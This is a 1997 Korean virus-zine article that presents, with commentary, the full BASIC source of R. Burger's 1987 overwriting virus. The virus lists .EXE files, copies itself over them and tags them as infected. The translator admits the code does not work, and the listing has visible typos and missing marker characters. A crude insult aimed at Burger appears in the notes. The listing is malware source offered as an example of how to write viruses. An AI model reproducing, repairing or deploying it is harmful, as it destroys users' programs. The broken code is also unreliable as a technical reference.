
 Basic 바이러스                                                 CVC #02  97/09

---------------------------------------------------------------------> NirWana

                        베이식으로 쓴 Virus
                        --------------------

베이식은 대단한 언어임에도 불구하고 사람들은 종종 베이식의 능력이 제한적
이라고 생각하고, 바이러스와 같은 일에는 사용하지 않는다.  이러한 태도는
분명 잘못된 것이다.  R. Burger가 1987년에 쓴 베이식 바이러스를 살펴보자.
이 프로그램은 겹쳐쓰기 바이러스로서 MS-DOS를 이용하여(shell을통해) .EXE
화일을 감염시킨다.  그러기 위해서는 먼저 MS사의 Quick-Basic을 이용하여
컴파일할 필요가 있다.  주의할점은 컴파일, 링크된 .EXE실행화일의 길이이다.
소스코드의 LENGHTVIR변수에서 가리키는 화일길이 부분에 이 실행화일의 길이
를 올바로 집어넣어줘야 한다.  BV3.EXE가 현재 경로에 있어야 하고, COMMAND
.COM을 사용할수 있어야 한다.  LENGHTVIR 변수가 컴파일, 링크된 실행화일의
길이로 설정되어있어야하며, 그러기위해 컴파일할때는 /e 옵션을 사용하는 것
을 잊지 말아야 한다.
( 역자 주 : 이 프로그램은 논리상의 여러 에러로 인해서 작동되지 않는다.
    단지 어떻게 베이식으로 바이러스를 만들수 있을지에 대한 영감을 얻는
    이상의 쓸모는 없다.  지금까지 살펴본바에 의하면 R. Burger가 만든 바
    이러스들은 다 이렇게 병신이었다. 그는 아마 바이러스로해서 자기 명성
    에 먹칠하기가 두려웠나보다.  아니면 자기자식 병신 만들어놓고 그걸 즐
    기는 변태성욕자든지... 그런 그가 바이러스에 관한 여러 교육과 글들을
    담당했다는 것이 신기하다. 더우기 그에게 교육받은 사람들이 제대로 돌
    아가는 바이러스를 만들줄 안다는게 더 신기하다. 하하하~ (농담 *^^*))

10 REM ** 데모용
20 REM ** 원한다면 당신방식에 맞게 수정해도 좋다. **
30 REM ** 베이식은 절대 쓸모없는 언어가 아니다.
40 REM ** 농담이 아니다.
50 ON ERROR GOTO 670                 ' 에러가 발생하면 670행으로
60 REM *** LENGHTVIR 변수는 **
70 REM *** 컴파일, 링크된 프로그램의  **
80 REM *** 사이즈로 설정되어있어야 한다. ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** 현 디렉토리의 모든 .EXE화일명을 INH라는 화일에 저장
130 SHELL "DIR *.EXE>INH"
140 REM ** INH화일에서 화일명을 읽어들인다. **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT #1,ORIGINAL$
180 LINE INPUT #1,ORIGINAL$
190 LINE INPUT #1,ORIGINAL$
200 LINE INPUT #1,ORIGINAL$
210 ON ERROR GOTO 670
220 CLOSE #2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "" 는 BV3의 지문이다.
250 REM ** "" 이 있다는 것은
260 REM  ** 이미 감염되어있다는 뜻이다.
270 IF MID$(ORIGINAL$,1,1)="" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** 각각의 이름을 화일명으로 결합한다. **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
    GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ 감염시킬 화일을 열기 +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ 이미 감염되었는지 확인 ++
440 REM ++ ""이 화일끝부위에 있다는 것은
450 REM ++ 화일이 이미 감염되었다는 뜻이다. ++
460 REM IF MID$(TEST,2,1)="" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)=""
499 REM ++++ 정상적인 프로그램 ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** 정상적인 프로그램을 감염시킨다. ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** 화일에 바이러스의 지문을 첨가 ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ 출력메시지 ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; "  !! BE WARE !!"
650 SYSTEM
660 REM ** 에러 메시지
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END

위의 베이식 바이러스는 .EXE화일만을 감염시킨다.  위의 프로그램이 실행되면
현재 디렉토리와 SORT.EXE와 같은 형태를 포함하고 있는 INH화일이 생기는것
을 볼수있다.  로 시작하는 실행화일은 바이러스가 백업용으로 사용하는 화일
로 간주되어 감염되지 않는다.

<< 참고 >>

베이식 바이러스에서 오류가 있군요.
""로 표시된 부분은 사실 "%"입니다.
통신 터미날에 쓸때 특수부호를 먹는걸 깜박했네요.
올리기전에 두개로 중복해 적어넣었어야 했는데....
죄송합니다.

